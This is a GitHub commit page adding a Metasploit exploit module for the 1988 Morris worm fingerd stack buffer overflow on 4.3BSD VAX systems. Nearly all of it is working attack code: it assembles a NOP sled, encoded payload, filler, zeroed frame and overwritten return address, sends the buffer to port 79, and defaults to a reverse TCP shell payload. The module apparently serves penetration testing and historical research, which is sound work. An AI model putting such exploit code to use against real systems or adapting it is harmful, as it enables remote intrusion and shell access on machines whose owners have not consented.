Skip to content

Commit

Permalink
Add Morris worm fingerd stack buffer overflow
Browse files Browse the repository at this point in the history
  • Loading branch information
wvu committed Sep 25, 2018
1 parent 4c62448 commit 9905d2e
Showing 1 changed file with 80 additions and 0 deletions.
80 changes: 80 additions & 0 deletions modules/exploits/bsd/finger/morris_fingerd_bof.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,80 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = NormalRanking

# This is so one-off that we define it here
ARCH_VAX = 'vax'

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Morris Worm fingerd Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in fingerd on 4.3BSD.
This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
},
'Author' => [
'Robert Tappan Morris', # Discovery? Exploit and worm for sure
'Cliff Stoll', # The Cuckoo's Egg epilogue and inspiration
'wvu' # Module, payload, and additional research
],
'References' => [
['URL', 'https://en.wikipedia.org/wiki/Morris_worm'], # History
['URL', 'http://computerarcheology.com/Virus/MorrisWorm/'], # Details
['URL', 'https://github.com/arialdomartini/morris-worm'], # Source
['URL', 'http://gunkies.org/wiki/4.3_BSD'] # Emulator
# And credit to the innumerable VAX ISA docs I found via Google
],
'DisclosureDate' => 'Nov 2 1988',
'License' => MSF_LICENSE,
'Platform' => 'bsd',
'Arch' => ARCH_VAX,
'Privileged' => false, # Depends on inetd.conf, usually "nobody"
'Targets' => [
# https://en.wikipedia.org/wiki/Source_Code_Control_System
['@(#)fingerd.c 5.1 (Berkeley) 6/6/85', 'Ret' => 0x7fffe9b0]
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'bsd/vax/shell_reverse_tcp'}
))

register_options([Opt::RPORT(79)])
end

def exploit
# 0x01 is NOP in VAX-speak
nops = "\x01" * 300

# This overwrites part of the buffer
junk = Rex::Text.rand_text_alphanumeric(109)

# This zeroes out part of the stack frame
frame = "\x00" * 16

# Finally, pack in our return address
ret = [target['Ret']].pack('V') # V is for VAX!

# The newline is for gets(3)
sploit = nops + payload.encoded + junk + frame + ret + "\n"

# Fire away
print_status('Connecting to fingerd')
connect
print_status("Sending #{sploit.length}-byte buffer")
sock.put(sploit)

# Hat tip @bcoles
rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message)
ensure
disconnect
end

end

0 comments on commit 9905d2e

Please sign in to comment.